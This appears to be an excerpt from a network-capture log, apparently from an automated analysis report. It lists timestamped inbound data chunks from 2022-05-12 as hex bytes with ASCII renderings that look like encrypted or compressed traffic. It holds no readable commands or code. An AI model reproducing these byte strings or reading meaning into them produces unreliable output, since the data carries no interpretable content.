                                                2022-05-12 15:08:07 UTC20INData Raw: a2 08 fc d4 2d e0 c4 7b ed f6 e6 5d a0 5a c6 a0 79 69 dd a8 28 ea 4d e8 fd 22 b7 ec ce 03 0a cb 16 5c d9 98 4d 93 d9 71 e1 99 bc 24 5b a4 12 d3 b6 f5 ec 2d a4 73 a3 7a ef 5d ab 1a 6f 09 c9 be 06 3c 0d 36 30 8c 7c 1a 4f d9 62 e3 9c 84 4e e4 a0 e3 70 13 f6 80 f8 ef 6f 60 28 c1 74 ce 04 df 68 91 8c b5 d3 fc 3f 6f 23 04 b0 33 b2 35 7e f6 dd 43 9d 7d 77 f1 ce a2 88 41 e5 41 ae 5d 3b fb f0 ee c9 5b 01 95 27 a3 85 94 8f 08 1b 07 07 a3 49 d3 21 25 96 d0 1f bf 0b 34 46 a1 59 15 27 64 34 b5 4c e0 8f 7a cf 61 e0 da 11 7e 34 64 9e e6 5f ba dc 4c a7 4e e8 c6 66 c8 d2 74 f3 d8 c0 c7 55 5c e5 8a 4e 7e ce 05 a8 e7 37 9b 02 e2 93 a1 d2 d1 c0 72 23 5d 21 02 70 0b dc 28 c2 7e 9c 24 4a 03 e9 d1 c8 4d d1 1e a3 9f 59 74 8d ff 62 2f 9e d7 10 ae be 42 a0 5e 1c 40 18 54 55 69 58
                                                Data Ascii: -{]Zyi(M"\Mq$[-sz]o<60|ObNpo`(th?o#35~C}wAA];['I!%4FY'd4Lza~4d_LNftU\N~7r#]!p(~$JMYtb/B^@TUiX
                                                2022-05-12 15:08:07 UTC21INData Raw: aa 60 58 f3 14 cf 5d fe 65 55 4f 83 90 ed 83 bb ab 85 8b fe 60 99 5e c5 84 d3 80 70 e7 30 c0 1f 59 b4 3b e0 0a ab 7a fe b1 69 d2 9b e2 f4 bc 68 01 9a a3 bb 06 11 f6 21 4d 28 f0 16 bf 17 d0 0a 50 18 e6 7f 43 71 95 82 a3 ff f0 70 bd 92 e2 dc a4 b6 13 37 08 6e 47 c7 94 a1 ae 13 37 69 28 91 d1 6b cf cc 94 f1 e6 a4 7f fa 83 1e 34 a8 4f ef cd a7 34 47 c5 d4 fd 19 82 38 e9 0a b2 fa 99 7f 63 82 ff 1a 01 55 ec 4e 71 3e 3b c6 c5 41 75 28 c8 8e 96 b1 fd b4 11 89 f0 f3 da 89 0c be f0 b5 24 38 f1 37 c7 80 04 f1 a0 03 8c 55 02 a2 90 5a b2 3b e5 79 e7 cc eb f7 da 2b f4 a0 3b a5 a8 29 19 85 b1 97 54 f7 d1 ff 0c db c0 73 65 37 57 fb 96 7d 89 1a ba 8a 62 5e 58 47 fb 63 57 37 63 ee 16 f1 90 43 70 e1 1c fd 54 e6 49 e5 33 5a bb 76 db 54 24 e4 66 60 3a 11 e4 55 bb a6 d8 f4 43
                                                Data Ascii: `X]eUO`^p0Y;zih!M(PCqp7nG7i(k4O4G8cUNq>;Au($87UZ;y+;)Tse7W}b^XGcW7cCpTI3ZvT$f`:UC
                                                2022-05-12 15:08:07 UTC22INData Raw: 29 e8 74 b9 bb 4c bc 10 cb 3d 3b 8e 7f 2e a8 07 91 b1 64 36 b9 54 2e a9 c4 84 11 bf 4d 39 04 13 f4 53 a8 51 df d8 f0 25 ee 45 d0 27 4d bd 7c 8a 86 07 e5 ca 7e 8e 08 19 20 0d 42 d6 41 09 b4 9c 65 11 1c ee 9c 18 d9 df 82 ca 5c f2 78 30 30 fc 57 94 c0 c1 61 5b c0 b9 94 2e 75 c2 bd 8b 46 55 cd ca 6b ae fb 15 d8 46 32 72 eb e3 a5 5a 49 c1 c7 5e b5 91 47 e3 0a d4 c6 00 a2 2e e5 4e dc 62 4d 9d 1f e0 87 d2 ec 0a 72 eb d7 65 4f 26 72 e2 ef 0a ce 46 f7 1f a9 74 6a ac 16 c3 b2 8d 3d 36 2d 67 e1 0a 50 e9 d6 ca f1 07 d9 80 5e ff b6 7c 32 52 c7 6e ed 32 17 44 83 fb bf 74 f8 fc 96 9c 4d 0b e9 9d df 21 5a fd dc b2 83 40 e9 db df cf b6 63 4d ac 71 5c 4f 32 4a b3 8b 50 6a d7 fa a2 5d 2d 24 15 ab 96 a8 4d 6c 30 bb 2e 8a e1 8c e5 55 ff 0e d8 87 25 77 52 51 7f 8e b1 87 ab d0
                                                Data Ascii: )tL=;.d6T.M9SQ%E'M|~ BAe\x00Wa[.uFUkF2rZI^G.NbMreO&rFtj=6-gP^|2Rn2DtM!Z@cMq\O2JPj]-$Ml0.U%wRQ
                                                2022-05-12 15:08:07 UTC24INData Raw: 20 e3 1a 5e 0d e3 cd 12 33 4e 19 30 8c 78 19 6e d1 9d e2 ba f4 41 ce bc ec 0d 52 ef 7e fd e9 21 49 59 c4 78 ce 07 ca e5 b0 a1 b7 c1 9e 1e 67 39 f0 9b 55 aa 49 3c d4 dc 47 f8 50 13 f1 c4 da d2 08 e5 45 ad ed 1a 38 9f cc c2 77 20 8c 51 ea 8c 8c 75 21 51 09 11 db 48 f9 21 21 18 74 38 61 07 77 5e ac 59 26 31 9a 24 8f 42 cf b9 7b c6 7d 1e d3 22 77 e1 67 99 79 60 7e 0a 47 a0 59 d5 7f 70 ea cb 8a e1 c4 c4 ff 37 5c e5 8a 66 72 ce 1c a2 0a 32 8f 84 e5 91 ce a0 c0 c4 6d c0 50 0d 05 79 7f 05 29 ee 75 10 90 75 fa e5 dd d8 23 9c 1e b2 9f 5a 81 80 d3 6f 23 4a cb 2f af b9 7f ad 55 ee 41 3c 4a b3 7b 70 88 16 8d 20 46 ea a8 49 c3 5b ab bd e0 36 52 aa 0a 87 1c 79 83 e1 0d 7e 51 9a 74 28 62 06 a1 25 d1 24 44 72 03 8a 39 52 1c ea 0f f2 3b 78 b8 13 e7 33 3a 8e 66 1d 84 22 2a
                                                Data Ascii: ^3N0xnAR~!IYxg9UI<GPE8w Qu!QH!!t8aw^Y&1$B{}"wgy`~GYp7\fr2mPy)uu#Zo#J/UA<J{p FI[6Ry~Qt(b%$Dr9R;x3:f"*
                                                2022-05-12 15:08:08 UTC25INData Raw: 16 f0 16 b4 83 27 09 41 19 2d 1e 43 2e 84 86 aa 73 c2 36 3d 8a 96 c1 a0 9e 0a 1d 25 68 6f ee 4a 68 84 a0 3e 63 a8 bd 3e eb cc c6 ee f5 e8 d1 60 e6 d5 39 34 a8 41 ed d4 a4 24 41 ed f6 fd 19 88 0b 29 0a be 4d 44 1c 60 99 cf 1c 1e 43 df 57 0f 76 3b c6 d0 41 6b 2a c8 8e d1 a7 fc b4 11 0b d1 c5 db 8d db 94 c4 b4 24 30 f9 cf ae 99 7a f9 ad 0a 9e 62 14 3d 99 33 a2 19 e5 73 e6 4f f4 c6 d2 28 2a 90 e2 3f a2 f5 2a f0 94 a1 26 f9 d6 71 bf f0 0a 66 bf ab 75 06 8a 55 79 9b b3 8c 68 84 91 6b d0 4e 57 35 76 95 0d 12 ef 4a 76 eb 30 fb 49 e4 43 3d 1b 7f 91 76 d1 d5 3d e4 66 64 e7 fa e6 19 f7 a4 d3 91 70 77 51 ab 18 e9 4c cf e1 2e b7 fb d8 fd 1a e5 17 63 ec 99 45 86 cd 98 36 2f b5 08 5a b4 52 2c 49 00 d0 b7 bd 9d b2 52 b8 5d ab 10 76 f3 c8 af 16 3b 1d 7f 30 8c 76 c4 46 c4
                                                Data Ascii: 'A-C.s6=%hoJh>c>`94A$A)MD`CWv;Ak*$0zb=3sO(*?*&qfuUyhkNW5vJv0IC=v=fdpwQL.cE6/ZR,IR]v;0vF
                                                2022-05-12 15:08:08 UTC26INData Raw: 01 5d d5 77 2f b1 ab 7f 0c c9 e5 c9 06 db b0 c4 ba 4d f8 f4 63 23 f9 44 9b a1 ef 6a 5b d5 36 e4 7b 8b c3 97 de 40 51 47 cd 7a a9 e2 f8 df 7b 3e 67 eb 2f bb 5b 49 c0 7c 5c b4 85 7e a6 14 d8 32 07 ae da 9b 7a dc ee 66 8e 19 fe 8c e9 ae 0b 63 e6 e0 2a b0 27 54 fd ff 67 ce 46 fd 28 41 67 6d a6 2f 08 a5 73 36 20 99 81 0d f2 4f f2 c2 de fc e8 d3 ba ab ef 9c 46 2e 40 cc 6e e3 37 1b 53 7d eb 94 69 d9 07 af b2 a5 fc 36 9e f4 32 6a d7 cc 33 83 4a c1 88 de cf ad 58 e9 8b 11 4f 48 32 5b bd 8f 50 6a d7 fb f4 26 2c 24 1b ac 92 b6 4a 65 38 42 36 58 e4 b6 ec 4b fe 14 c2 9c db 67 79 49 87 87 07 9a bf d8 8c 82 e5 9a b0 64 d0 82 dd 32 3c ae 31 ca 95 52 db 71 e5 d7 1c 51 b5 b0 6b c7 c6 fb f1 cf 61 08 80 59 92 3d 17 dd 04 7e 06 f0 1f a2 69 d8 26 52 04 36 e0 49 67 6b 81 90 8f
                                                Data Ascii: ]w/Mc#Dj[6{@QGz{>g/[I|\~2zfc*'TgF(Agm/s6 OF.@n7S}i62j3JXOH2[Pj&,$Je8B6XKgyId2<1RqQkaY=~i&R6Igk
                                                2022-05-12 15:08:08 UTC28INData Raw: f3 54 7c f2 ec 3d af 41 ef 69 bb dc 59 3a f9 f9 3d 76 06 8c 32 ae 8c 85 6c f7 36 25 18 d5 6d ae 6e 21 18 63 16 68 07 36 46 52 58 30 3a 9d 36 8f 66 7c 82 7a c0 71 04 d6 3d 75 01 98 b4 5d 52 a5 08 3a ed 46 d9 77 6f eb df 74 e9 f3 3d c6 df 51 ed f4 4e 7e ce 1e c3 bb 33 a3 89 fe 9e a1 db d6 3a 6a f1 5e 1a 00 66 7c e4 21 3c 7b 3e 91 76 dc dc b7 2d a1 2a 16 98 9b 56 ba 8e d3 cb 38 b4 ca 48 aa be 42 b2 45 da df 34 57 4d 7a 54 b3 ea f7 45 42 c1 a5 56 e7 7f a2 a0 14 34 56 86 0c 85 6b 34 ab c2 08 60 57 b2 1b 36 9c 01 ab 31 da 3c 31 3f 0f 74 3c 61 34 e4 74 b3 23 86 bd 3c c7 64 be 8e 6c 18 a7 1e 27 b0 6c 2f 72 55 02 b2 d1 bf f7 87 d7 32 28 1a ee 4e af 46 cd d8 f0 25 df 53 d5 5f 05 31 6d 8e 9b 09 8a d6 65 70 03 1d 38 0b 3c ee 64 24 bb c7 3b 15 37 e0 fe 05 d9 d7 9f b2
                                                Data Ascii: T|=AiY:=v2l6%mn!ch6FRX0:6f|zq=u]R:Fwot=QN~3:j^f|!<{>v-*V8HBE4WMzTEBV4Vk4`W61<1?t<a4t#<dl'l/rU2(NF%S_1mep8<d$;7
                                                2022-05-12 15:08:08 UTC29INData Raw: 36 3a a1 f7 fd 1d e7 d1 e1 0a b8 e9 9e 0f 64 8e e1 0b 1b 21 ce 52 10 3e c5 c7 ed 79 6d 51 86 88 be 96 92 eb 1a 09 f3 fe c5 87 c2 fe f3 a4 21 2d 10 43 d8 9a 62 eb a5 03 99 78 05 5e 91 70 87 1a 9e 37 ed 4c e6 f5 a1 7f 29 87 3c b3 aa 50 56 f3 82 8a a4 49 be 8b 08 f3 d6 6c 76 34 7f c9 93 64 7d 9b 9f 9a 60 21 cb 4e f8 67 38 6a 7d 99 2f 50 e4 50 63 e4 18 c4 4c fb 59 1d 1a 55 b2 4e da 2b d2 1b 79 75 f4 ff e6 44 be bb d6 72 71 5b 40 b2 2f 84 c9 e5 8f ab d8 79 d8 fd 0d f8 06 58 d0 98 54 89 d7 9c 1e b4 92 00 5c e7 38 2d 49 0e fc f9 b7 43 a0 65 81 4e ae 1a 4f 0c d6 a4 ee 30 19 44 37 8e 07 54 46 c2 98 8d ef 81 59 c4 b5 34 c8 cd e4 61 f5 d0 6e 4b 60 de 66 c3 f3 c9 ba 9c a8 a6 cf cf 09 99 c6 05 ae 11 bb 4e 53 e7 d8 59 0c 79 5a f7 ef 36 b0 48 f6 40 a9 d6 51 25 fc 10 c2
                                                Data Ascii: 6:d!R>ymQ!-Cbx^p7L)<PVIlv4d}`!Ng8j}/PPcLYUN+yuDrq[@/yXT\8-ICeNO0D7TFY4anK`fNSYyZ6H@Q%
                                                2022-05-12 15:08:08 UTC30INData Raw: d8 bf 54 f2 3f db 43 58 8e 25 9f 6c ef 6b 4b f5 57 ff 8a c5 e6 21 78 ef b3 35 b1 27 5a f5 e4 30 cd 3d b9 00 a3 63 7b bb 74 b7 a4 73 36 17 05 7d e4 27 70 07 2e d5 fc 74 f7 ac 55 ef ba 47 42 1d c7 6e f6 3f 7f 1d 83 ea bc 7d 9d 70 96 b0 51 25 ca e7 85 21 5a d1 c7 98 a5 43 c7 db d9 c9 32 f9 8e 9b 0e 4e 48 38 ec db aa af 6b f1 e0 d9 6a 2b 32 00 a3 e4 cf 4a 6c 2b bb 26 71 58 ce 3a 5a f4 02 a1 b0 f0 62 3a 35 81 8f 97 b3 d9 8c 8c 8b fa 7a 82 4e ce eb 4b a8 53 ed 27 e0 9f 4b 84 38 e4 f8 16 79 fe e7 6b cd fb a2 55 c2 61 0b 96 a5 90 19 7c 63 27 65 0d dc 1a b1 9f b6 42 50 1c 31 b1 57 7a 4b 91 b8 99 92 7f c8 45 e8 d4 8c 98 03 5a 55 68 6f ee 48 a6 8e 93 3f 79 28 95 0e ea ca cc 89 d0 f9 dd 4c e3 fd 17 2f 98 4e c7 d2 a4 34 41 ba f7 fd 08 8a e8 9b 44 b2 fe 40 69 c0 82 ff
                                                Data Ascii: T?CX%lkKW!x5'Z0=c{ts6}'p.tUGBn?}pQ%!ZC2NH8kj+2Jl+&qX:Zb:5zNKS'K8ykUa|c'eBP1WzKEZUhoH?y(L/N4AD@i
                                                2022-05-12 15:08:08 UTC31INData Raw: 63 0e 75 b3 71 49 ab 15 53 5e 47 f5 67 72 99 9c 74 e0 ec c5 d1 f5 d2 52 e5 08 7e ce 1e a1 e1 20 a5 8d f3 95 be d9 3e c5 47 d7 7c 0d 05 66 75 f6 37 ce 69 14 93 4c df fd 23 d3 72 db 1d c9 fe 45 8a 88 ea 71 c6 4b 35 19 b9 b8 53 b5 4f f4 bf 35 7b 4e 6d 4f ae 14 e7 6f 59 fd 52 4b c7 7d 81 b8 d2 ba 87 70 f4 ad 16 7a b8 f2 08 7e e9 b1 13 28 38 00 87 2a cb 37 4a 55 ab 77 38 7e 3d f9 72 a6 c5 79 90 00 c7 14 40 ea 6c 1e a8 68 79 b0 64 3c 86 4a 3d be d2 86 10 99 29 39 28 1f f6 41 c0 ef d1 26 f7 04 c9 5d c5 24 4a 20 6b 95 8b fb 8b f2 78 98 11 35 2a 02 51 da 64 35 b7 a5 67 eb 36 c8 c7 0b a2 91 80 bb 49 f0 7b 49 78 f9 45 95 d4 60 61 5b c2 15 87 73 75 c8 ad 8e 26 32 ca ca 70 b6 f7 f8 df 6a 29 77 e2 b8 14 5a 65 e3 dc 36 fc 91 56 e0 17 db 43 5c 8e 25 9f 15 40 62 49 88 31
                                                Data Ascii: cuqIS^GgrtR~ >G|fu7iL#rEqK5SO5{NmOoYRK}pz~(8*7JUw8~=ry@lhyd<J=)9(A&]$J kx5*Qd5g6I{IxE`a[su&2pj)wZe6VC\%@bI1
                                                2022-05-12 15:08:08 UTC33INData Raw: 6a 1b db de 5c 9a 1c e3 51 93 4d e2 fd cc 31 46 f3 38 a5 a2 34 17 e0 86 8e 3b fa ce f3 f6 f2 f0 66 67 4a 31 d8 96 79 80 b2 cd 8b 62 50 93 50 97 17 57 35 76 86 28 fb ea 4a 61 e5 0f 2b 48 c8 4a fb 08 7d bb 67 d5 ce d3 e5 4a 4e e5 81 a8 55 bb a0 dd 01 5f 77 50 b1 25 e3 5a fc b1 b2 be f3 c7 b6 97 ee 0c 57 49 91 5c 90 54 86 f6 af d1 7b 5e 9c 61 36 5a 0e c6 3c b3 5c b4 84 94 71 a2 22 57 f6 36 50 0f 24 26 55 30 9d 78 05 5e 3c 9d ce ce 82 22 80 bc ee 74 05 e3 f3 d6 c3 6b 4a 7c d2 6f ee f2 c8 96 90 3c be dc d1 c0 66 39 fa 2d 16 b0 6b ac f6 dd 47 6e 71 6f d1 3b dc af 41 79 4c b3 e7 ab 3a f0 ee 5f 7e 31 ae d5 a3 8c 8c ed 00 2b 29 ee dd 6e d3 bd 28 05 47 f7 65 07 3f c3 a5 47 3c ce 9a 35 99 d2 fe 9d 73 e6 82 1e db 3d e0 16 79 bf 51 a7 ad 0a 47 3c 4f c6 78 50 1d d2 74
                                                Data Ascii: j\QM1F84;fgJ1ybPPW5v(Ja+HJ}gJNU_wP%ZWI\T{^a6Z<\q"W6P$&U0x^<"tkJ|o<f9-kGnqo;AyL:_~1+)n(Ge?G<5s=yQG<OxPt
                                                2022-05-12 15:08:08 UTC33INData Raw: 0f 37 31 d9 cb 7a 6b 2a d9 8c a2 6c fc 98 0c 0b 82 bd da 8d d5 e4 de 9d 5f 3b ee 48 e2 81 15 8c a0 03 82 60 0a a4 90 4d 9e 06 1b 78 c1 5b e0 8c 94 2f 29 83 2e 8d d4 2a 06 f9 94 94 45 8a d1 ff 02 ec d5 62 61 31 6e dc 80 83 82 b6 b0 9d 71 5e 85 5f fc 7c 4c cb 7d b5 27 c3 eb 72 40 1d e7 2a 63 e4 49 e3 08 49 be 76 97 d7 2d e4 3b 64 e7 eb f0 46 b3 9c ff 8f 70 77 50 a1 20 f1 b2 e2 cd 25 b3 8b 87 fc 0b ed 07 4f c9 8b 4d 8c d9 87 ff a7 40 0e 72 96 7a 2b 5e dd d5 2b a8 50 b3 72 95 4c a3 05 54 f7 c8 83 1c 32 65 44 4d ec 7c 1a 42 dd 97 f1 b8 80 48 c6 a3 f4 8e 1b c3 64 fa 93 69 30 3f db 79 ca 62 97 97 90 aa be 11 49 51 1b 65 fa b1 1b b7 50 40 fe dd 56 fa 67 6f 0f c5 f0 a1 42 b5 54 ac a9 29 61 f0 ee c7 68 30 9d 22 a3 9d 84 6e 1d c9 08 3d d0 69 d5 af 96 23 44 0a 65 07
                                                Data Ascii: 71zk*l_;H`Mx[/).*Eba1nq^_|L}'r@*cIIv-;dFpwP %OM@rz+^+PrLT2eDM|BHdi0?ybIQeP@VgoBT)ah0"n=i#De
                                                2022-05-12 15:08:08 UTC35INData Raw: 9d ed e4 64 b7 31 70 2e c8 2a dc 4e f7 11 ab 78 60 52 06 e8 b1 61 39 0b 29 6e f6 0b 58 f1 c0 d3 d4 7e d9 ac 5f f1 be 56 31 53 d6 66 eb c2 05 6f 8e e9 a7 7e 96 1d 98 ef df 10 cd 86 cd 29 5a c4 c4 a5 7d 4b ed ce c9 dc b4 4e f5 bb 65 41 b6 33 77 b6 bc ab 53 18 0d 23 91 3c 21 3b b5 bb b8 4a d1 20 bc 37 2b e0 a0 f1 47 ff 2c 64 81 25 66 55 47 98 71 9c 9c ad c2 a4 f0 ff 64 bb 4e d1 eb 27 a8 53 ed 2a c6 9f 58 ae c5 e5 fb 06 66 de 99 10 cc ea db eb da 0e f3 9a a7 99 0a 1f f6 2f 7a 01 0e 17 99 85 c6 00 78 67 3a e0 4a 77 8a a4 d3 7f c3 69 c9 84 e9 d0 a0 96 1c cb 09 44 6d fc 98 a1 ac 8f c0 68 04 84 13 f2 e4 b7 95 f3 f3 d1 53 e9 92 e5 34 a8 41 da d8 a5 3c 5c 13 f6 d1 0c 8b c3 bb 0a b2 fa 6c 62 61 82 f5 1e 01 2d b0 a5 0f 37 31 d8 cd 69 67 32 36 89 92 98 e2 fc 96 26 f9
                                                Data Ascii: d1p.*Nx`Ra9)nX~_V1Sfo~)Z}KNeA3wS#<!;J 7+G,d%fUGqdN'S*Xf/zxg:JwiDmhS4A<\lba-71ig26&
                                                2022-05-12 15:08:08 UTC36INData Raw: 5d e5 80 63 74 c5 14 b9 e8 cd a2 a1 f8 91 da 9c c0 c4 6f de 27 6d 0d 66 71 d3 54 c3 7a 18 85 47 b6 90 dd d2 54 c8 15 b2 9c 5d 74 8d ff 69 3a cf 84 03 aa ba 3c fb 48 e2 4b 3e 4e 46 7a 5b b5 ea f7 45 66 e8 d7 04 eb 7f ae bf e9 4e 26 8f 0b 83 79 e6 ab c2 0a 56 27 b3 13 22 74 1a e8 4f dd 24 46 73 04 74 3f 69 c3 e9 58 b9 23 73 bc 17 d6 e9 3a a2 7a 1c d7 49 2b b0 60 35 f7 09 2e b8 d6 89 7c 51 b8 47 05 13 fe 58 a4 4e d6 3d 0f 08 fa 43 d4 59 04 31 6d 8e 85 7e d7 de 7f 8a 1d 3f 5f da 2d a3 65 24 bb a6 7f 15 30 fe 1b 08 f5 c5 82 c0 03 f2 78 36 20 82 1c 91 bb f8 49 20 c5 3d f1 64 6d ad cf 94 49 4c d1 c1 7a ae f5 15 d8 46 3a 66 f6 a3 ed 44 43 3f df 61 b0 ba 53 dc f2 26 c7 fe a4 25 9b 7a cf 52 4d 8e 94 ff 8a c1 89 0a 63 fd de 7f b5 1f 31 eb d7 20 cf 57 f3 1b 5d 66 41
                                                Data Ascii: ]cto'mfqTzGT]ti:<HK>NFz[EfN&yV'"tO$Fst?iX#s:zI+`5.|QGXN=CY1m~?_-e$0x6 I =dmILzF:fDC?aS&%zRMc1 W]fA
                                                2022-05-12 15:08:08 UTC37INData Raw: f3 86 a6 bf ff d1 f5 0a f6 52 c6 18 88 7f d8 92 7f 81 e1 0a 8a 62 5e ad da f9 63 5d 48 c4 99 25 ec c4 4a 70 f2 28 d7 49 a7 48 e3 1b 1c bb 76 c0 c2 3e e0 5e 51 e6 fa e6 55 aa a0 d8 85 8e 76 7c ba 20 d3 fa e3 e1 2e a8 ee cb f9 0b f6 10 50 2b 99 69 98 ca f4 56 b5 be 0b 20 8d 6a 2d 43 22 dc 2c b7 49 ab 66 86 59 ab 0b 5a 13 37 ae 3c 3f 37 2a 82 8c 7c 1e 6e 54 9d e2 ba 9b 4a ca bc ff 74 05 e5 80 f8 ef 64 49 0a 6f 79 ce 09 e0 00 91 a0 bd d4 fa 2c 62 39 eb b5 08 56 4a 7f f5 c5 54 f6 78 67 f5 d8 22 ae 6d ec 42 90 43 54 3a f0 f3 d0 73 2a 9f 2e be 72 8d 5d 07 35 72 a7 dd 6e d7 09 b7 19 67 02 7b 14 3b 5f bd 5d 04 cf 9b 19 8d 4c 8c 30 7a c6 79 60 ca 3c 7c 15 4e af 70 58 a7 00 5e b3 42 d9 62 74 fb 2c 75 cc e1 c5 fe 91 a3 1a 75 66 6d ca 14 af f0 2c a8 73 e3 bf b4 d0 bb
                                                Data Ascii: Rb^c]H%Jp(IHv>^QUv| .P+iV j-C",IfYZ7<?7*|nTJtdIoy,b9VJTxg"mBCT:s*.r]5rng{;_]L0zy`<|NpX^Bbt,uufm,s
                                                2022-05-12 15:08:08 UTC38INData Raw: 2c c8 9c de 0a 4b dd db 22 95 64 ca ed dc cf bc ce ee 6e 66 4e 48 32 55 b0 bb 87 68 d3 22 dc 6e 2b 3d 22 86 85 bf 49 03 f8 bc 37 72 f3 a4 f1 55 de 13 d1 8a f8 9c 55 4f 81 9e 99 df b7 d5 8c 81 00 6f b0 48 c5 93 d6 80 82 e7 30 cc 9c 54 9c ed e4 d7 10 16 24 b1 6b c7 cc d3 e5 ad ba 01 9a ad 9e 18 0d d9 2c 45 0e f0 16 35 9d 04 c9 50 1c 3b e8 56 e0 8e ae b7 ad c6 69 c3 1b e8 01 12 9e 0b 35 00 7f fe fa a5 aa 84 96 3e 69 a8 9f d1 4b cc cc 94 fb ee 46 5a cd f4 1f 23 39 41 1a 46 a5 34 41 e5 ef 6c 0f a6 b3 c0 0f b2 fe c4 16 bd 03 ff 18 1e 29 c6 c6 18 19 2f ce d8 f8 76 04 c6 80 a7 03 e7 9a 13 29 fc f3 da 0d db 25 94 bd 3d ab e5 45 e3 aa 77 f1 bf 09 a6 50 39 a5 90 5c 1a 12 3b 2b ea 56 d1 fa d3 30 3f a9 24 85 ad 2b 06 73 88 50 6b f6 cb 6e 1b f6 d5 6c 74 34 a9 f6 9e 5d
                                                Data Ascii: ,K"dnfNH2Uh"n+="I7rUUOoH0T$k,E5P;Vi5>iKFZ#9AF4Al)/v)%=EwP9\;+V0?$+sPknlt4]
                                                2022-05-12 15:08:08 UTC40INData Raw: 2c a9 4c 56 5e 83 16 dd 8a 50 c0 ac 59 db 7d aa 95 ea 35 7a 89 0b 87 07 6c a0 e9 17 7e 5c a5 ed 29 4e 02 9f 30 dd 23 5a 93 0e 58 3a 69 36 e8 73 a3 c5 79 90 12 e4 15 10 6d 6e 65 6b 07 2b b4 4e 14 8e 57 53 7f d2 97 12 ad d7 38 04 00 c4 40 af 66 d1 26 f1 78 d6 54 c7 34 41 1a 76 8a 81 12 74 df 53 8c 1a 3a 35 0b 54 22 65 08 b3 ad 7f 15 30 fc 1b 08 f5 dd ab b9 66 11 7a 49 eb f9 45 95 91 de 63 58 b9 f5 fb 72 71 e8 bb 94 49 55 fa cf 7a b3 e3 eb d9 18 38 71 ec a1 fd d6 67 c1 de 4f b8 97 40 e7 11 ab d5 01 8e 23 39 7c d9 4a ad 8e 19 f9 a0 c1 eb 19 53 eb c8 72 b1 27 5e 99 d7 20 de 44 e0 8d 8d 67 6d ae 0d c2 b3 70 38 1f 20 7b 81 e3 50 f8 d7 77 fa f7 dd 84 b1 ee b0 43 13 53 c7 7d c2 3f 04 fd 83 ea b8 6b f2 02 97 b2 73 14 c9 9c d4 23 4c a8 00 b3 83 4e c3 db a3 02 bc 4e
                                                Data Ascii: ,LV^PY}5zl~\)N0#ZX:i6symnek+NWS8@f&xT4AvtS:5T"e0fzIEcXrqIUz8qgO@#9|JSr'^ Dgmp8 {PwCS}?ks#LNN
                                                2022-05-12 15:08:08 UTC41INData Raw: 98 a6 c7 8c 47 75 50 b0 06 ea 4c e3 fc 2e b7 e5 da fd 0b e7 00 4b d5 98 14 8e c8 8f 85 b7 be 0f 42 9c 6b 2d 49 0a c6 2d ac 73 a8 7a 93 59 ab 1a 2b 09 c9 be 13 25 64 55 25 d8 79 0e 17 cc 98 f4 e2 8e 5c da ed fa 7b 18 fd 7f f7 c5 43 a3 71 db 7f e3 0f de bc e3 f7 b7 cb fb 35 61 2e 77 eb 1f a8 4a 40 e5 cc 54 e4 67 7c 6c d5 cf c0 79 e4 45 a3 d4 41 2c e3 fa e8 3e 3b 9b 3b b7 16 9f 77 18 31 1e 9c 87 6e d3 20 32 0e 76 1e 73 18 32 c2 bd 4f 73 9e 9b 35 93 21 f0 83 7a cc 6b 2f c6 3b 6d 19 71 38 2b 58 ad 0b 54 b7 57 ce 65 6f ef 4f 65 f7 87 6c c6 f3 56 8a d1 7c 7e c4 05 aa e3 e5 b0 99 f3 87 b0 c7 4e 73 59 72 5a 1b 62 d6 74 fb 22 d5 f7 48 93 5d d8 f7 ca c3 49 c3 01 92 06 54 9d e3 eb 66 38 be d9 07 bb ba dd 13 50 cc 52 36 77 4d 7a 5c 28 3c 03 6b 46 ec 84 a0 eb 7f ac 9b
                                                Data Ascii: GuPL.KBk-I-szY+%dU%y\{Cq5a.wJ@Tg|lyEA,>;;w1n 2vs2Os5!zk/;mq8+XTWeoOelV|~NsYrZbt"H]ITf8PR6wMz\(<kF
                                                2022-05-12 15:08:08 UTC42INData Raw: 97 63 b1 8e d3 8f 9f af 7d a2 43 c7 95 de be ad e6 1c c9 88 43 bf 3b f5 dc 09 72 00 b0 47 cf c1 d4 d5 e0 9e fe 65 b6 97 00 15 20 34 61 03 e1 10 6f 9b de 7e 5c 1c 3b fb 56 78 8c 5a 94 37 c2 69 c9 8a e6 ce a0 b6 c4 35 08 6e 56 9d 6b 5e 5b 90 16 ca 28 95 06 ed b8 c0 94 f3 e2 c1 4a 8c 2b 17 34 a2 1a d6 d0 a3 0f 55 ec f7 fd 08 8c be 3a 19 b5 fa 55 1b 77 58 e8 ce 93 0e df 57 0e 66 2f 16 43 69 6f 2b e0 9c be 92 f7 9c 4e 0b f9 f5 c1 00 d6 fb f3 b4 37 32 ff 4a e2 9e 52 e9 a0 03 82 df 08 a8 87 5a 16 49 e5 79 ec ee f3 ff c2 2b 79 25 29 ad b1 3d 8a a2 82 8e 2b 5c c0 f7 12 e2 db fd 34 31 7f d9 34 6c 8b 89 ba 9b 6b 4e 91 55 75 31 57 35 7d 8a 2f f9 e4 5c 67 7d 09 df 5e f3 d5 f2 11 61 ac ea c0 de 34 f2 fa 75 ed e0 f1 c9 aa ae d0 a4 ec 77 50 ba 0e fb 46 f5 71 02 bd f5 d1
                                                Data Ascii: c}CC;rGe 4ao~\;VxZ7i5nVk^[(J+4U:UwXWf/Cio+N72JRZIy+y%)=+\414lkNUu1W5}/\g}^a4uwPFq
                                                2022-05-12 15:08:08 UTC44INData Raw: 11 ca ac 07 2f af 76 25 8a 54 3f be cc 69 17 ab c7 3a 7f c9 f4 42 ab 59 ac fa f1 09 d2 4b df 31 4c 31 7c 8c 99 09 74 df 53 81 00 4a e7 0c 42 d8 4c f7 b1 ba 72 0a 3a f7 e3 09 c8 d9 98 45 4c de 73 30 58 22 45 91 bf d0 41 42 d7 3b fb 63 73 dd ae 6a 48 6a c6 c8 6b ac 9e 39 d9 6a 3c 6e eb b0 ec 5b 58 c7 c4 b3 b3 bd 53 f3 19 c3 2b 07 8e 34 9d 65 d3 9c 48 a2 12 f6 fe 82 eb 0a 62 e7 d7 7c a2 21 5e fa d1 37 31 47 db 03 bb 74 6b ac 16 c2 b3 8d 3d 36 2d 68 e1 0b 50 e9 d7 ca eb 07 d9 80 57 c5 b5 7d 15 ad 38 91 d8 3c 04 43 98 da bd 6b 07 02 97 b0 5b 03 c9 9c dc 5a 86 d5 cc b7 af 41 c3 a2 2e cf bc 48 39 52 7a 4f 48 30 20 63 97 ae 6f d7 da de 78 50 f3 11 a6 8f b9 5f 11 f8 bc 37 70 e2 db 34 51 f3 10 c9 fb f7 66 55 4b ee 4f 9c b0 a8 ec 12 8b 